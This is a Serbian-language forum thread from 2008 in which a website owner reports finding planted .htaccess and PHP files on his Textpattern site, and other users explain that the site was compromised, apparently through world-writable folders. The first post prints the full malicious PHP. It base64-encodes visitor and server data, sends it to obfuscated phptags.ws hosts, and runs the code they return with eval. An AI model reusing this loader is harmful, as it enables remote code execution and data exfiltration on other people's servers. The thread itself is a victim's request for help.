Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Jel ovo neko pokusao da mi hakuje sajt ili ...

[es] :: Linux/UNIX serveri i servisi :: Jel ovo neko pokusao da mi hakuje sajt ili ...

[ Pregleda: 4193 | Odgovora: 6 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Max Payne
Max Payne
Beograd

Član broj: 58800
Poruke: 333
*.ptt.rs.



+6 Profil

icon Jel ovo neko pokusao da mi hakuje sajt ili ...23.09.2008. u 14:59 - pre 162 meseci
Potpuno slucajno primetim prvo u files folderu fajlove kojih inace tu nikad nije bilo, ja se ne secam da sam ih ja tu stavio. Rec je o dva fajla:
jedan je .htaccess, a drugi neki php fajl.

U htaccess fajlu pise ovako:

Code:
Options -MultiViews
ErrorDocument 404 //files/86779.php


A u php koji se zove kao sto gore pise 86779.php fajlu ima sledece:

Code:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:
$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c)."."
.base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).
".$s.".base64_encode($i).".".base64_encode($j);if((include(base64_decode("aHR0cDovLw==").
base64_decode("YS5waHB0YWdzLndz")."/?".$str)));else if(include(base64_decode("aHR0cDovLw==").base64_decode("Yi5waHB0YWdzLndz")."/?".$str));else if($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>


Prvo sam pomislio verovatno nista, kad onda primetim i u images folderu isto, i u tmp folderu ovako nesto pise u .htaccess fajlu:

Code:
Options -MultiViews
ErrorDocument 404 //textpattern/tmp/202975.php


Sada je vec i meni jasno bilo da je neko pokusao da mi hakuje sajt. Jel ima neko da se razume pa da mi objasni sta je doticni hteo da uradi, koja je to tehnika, i da li treba nesto da preduzimam povodom ovoga.

Ocigledno je hteo da postavi svoju 404 stranicu i onda da pokrene kod u nekom od ovih php fajlova, koliko vidim u svima pise isto, samo je naziv drugaciji.

Sajt inace radi, nisam primetio neke probleme, i ne znam tacno kada se ovo desilo, ali ne bih rekao vise od mesec dana.

A inace me zanima kako je neko mogao uopste da uploaduje ove fajlove na server (kad bolje razmislih ovo me interesuje vise od svega)?
 
Odgovor na temu

misk0
.: Lugano :. _.: CH :.

SuperModerator
Član broj: 634
Poruke: 2824
*.adsl.ticino.com.

ICQ: 46802502


+49 Profil

icon Re: Jel ovo neko pokusao da mi hakuje sajt ili ...24.09.2008. u 09:43 - pre 162 meseci
Da, neko ti je uhakovao sajt. U onim cudnim stringovima je skriven sajt phptags.ws, tj a.phptags.ws, b.phptags.ws i jos par vhostova.
Obrishi to, a kako ti je upao... e to zavisi od software-a koje imas instaliran na hostingu, koji je vjerovatno supalj.

I ne znam, sta dobija sa tim, tj zasto to radi...
http://a.phptags.ws/en/

tu postoji neko objasnjenje vezano za generisanje saobracaja. Samo nisam skontao za koji sajt tacno se generishe saobracaj.

:: Nemoj se svadjati sa budalom, ljudi cesto nece primjetiti razliku ::
 
Odgovor na temu

Max Payne
Max Payne
Beograd

Član broj: 58800
Poruke: 333
*.ptt.rs.



+6 Profil

icon Re: Jel ovo neko pokusao da mi hakuje sajt ili ...24.09.2008. u 10:17 - pre 162 meseci
Hvala, obrisao sam sve te fajlove, kontaktiracu hosting firmu gde se sajt nalazi, bas da cujem sta imaju da kazu.

Inace, jel si hteo da kazes da je neko pokusao da mi uhakuje sajt, posto ne vidim da se ista desilo sa sajtom? Da li su one skripte nesto uopste radile?

Koliko ja razumem, on je pokusao da postavi svoju custom 404 error page, koja bi u slucaju greske onda otvarala te njegove skripte. Medjutim, cak i kad se upise neki pogresan url opet se otvarala moja 404 error page.
 
Odgovor na temu

misk0
.: Lugano :. _.: CH :.

SuperModerator
Član broj: 634
Poruke: 2824
*.adsl.ticino.com.

ICQ: 46802502


+49 Profil

icon Re: Jel ovo neko pokusao da mi hakuje sajt ili ...25.09.2008. u 09:18 - pre 162 meseci
Vidi, on (neko) je uspio da ti upadne na hosting account i da postavi svoje fajlove. To što nije dirao tvoj sajt je tvoja sreća, ali činjenica je da je ima privilegije da to uradi.
:: Nemoj se svadjati sa budalom, ljudi cesto nece primjetiti razliku ::
 
Odgovor na temu

Max Payne
Max Payne
Beograd

Član broj: 58800
Poruke: 333
*.ptt.rs.



+6 Profil

icon Re: Jel ovo neko pokusao da mi hakuje sajt ili ...25.09.2008. u 19:17 - pre 162 meseci
Kontaktirao sam hosting kompaniju gde mi se nalaze sajtovi, i mislim da su dali dobro objasnjenje kako se ovo desilo (ne znam ali cini mi se).

Naime, ovaj .htaccess i php fajl, samo sa drugim nazivom php fajla, su se nalazili ne samo na jednom vec sam ih nasao na tri sajta koja se nalaze na istom hostingu. I u sva tri slucaja folderi u kojima sam nasao ove fajlove imali su permisions 777 (images, tmp i files folderi).

Ovako su mi odgovorili iz hosting firme kada sam ih pitao kako je neko mogao da uploaduje ove fajlove na moje sajtove:

It's possible that since the directories may have had 777 permissions which allow for anybody to upload anything. Some scripts require it, but we dont recommend it.

Cinjenica je da su ti folderi zaista imali 777, ali mi stvarno nije jasno ipak kako se to radi, kako moze neko da uploaduje fajlove na neciji sajt, mislim cak iako su neki folderi 777?
 
Odgovor na temu

Tyler Durden
Tyler Durden
Beograd

Član broj: 4312
Poruke: 3379
*.verat.net.



+1365 Profil

icon Re: Jel ovo neko pokusao da mi hakuje sajt ili ...26.09.2008. u 08:05 - pre 162 meseci
Ako ti skripta koja radi upisivanje u te direktorijume nije dobro/sigurno napisana... mislim da je sasvim jasno kako je moguce.
Beneath civilization's fragile crust, cold chaos churns...
 
Odgovor na temu

Max Payne
Max Payne
Beograd

Član broj: 58800
Poruke: 333
*.ptt.rs.



+6 Profil

icon Re: Jel ovo neko pokusao da mi hakuje sajt ili ...27.09.2008. u 19:39 - pre 162 meseci
Pa, skripta koja radi upisivanje je deo Textpattern CMS, ne verujem da je to problem.

U svakom slucaju, nakon dvodnevne prepiske sa mojim hosting provajderom, gde sam trazio da mi omoguce 700 ili 711 ili 755, jer je Textpattern podesen da bez problema radi tako, njihov zadnji odgovor je bio

Unfortunately, it appears that the folders must be 777 to work correctly.

Drugim recima, posto je rec u shared hosting-u, oni to ne mogu da nameste. Tako da sam sada nacisto da moram da menjam hosting.

Evo tema sa txp foruma iz koje je jasno da je problem do hostinga.

http://forum.textpattern.com/viewtopic.php?id=26613&p=1

 
Odgovor na temu

[es] :: Linux/UNIX serveri i servisi :: Jel ovo neko pokusao da mi hakuje sajt ili ...

[ Pregleda: 4193 | Odgovora: 6 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.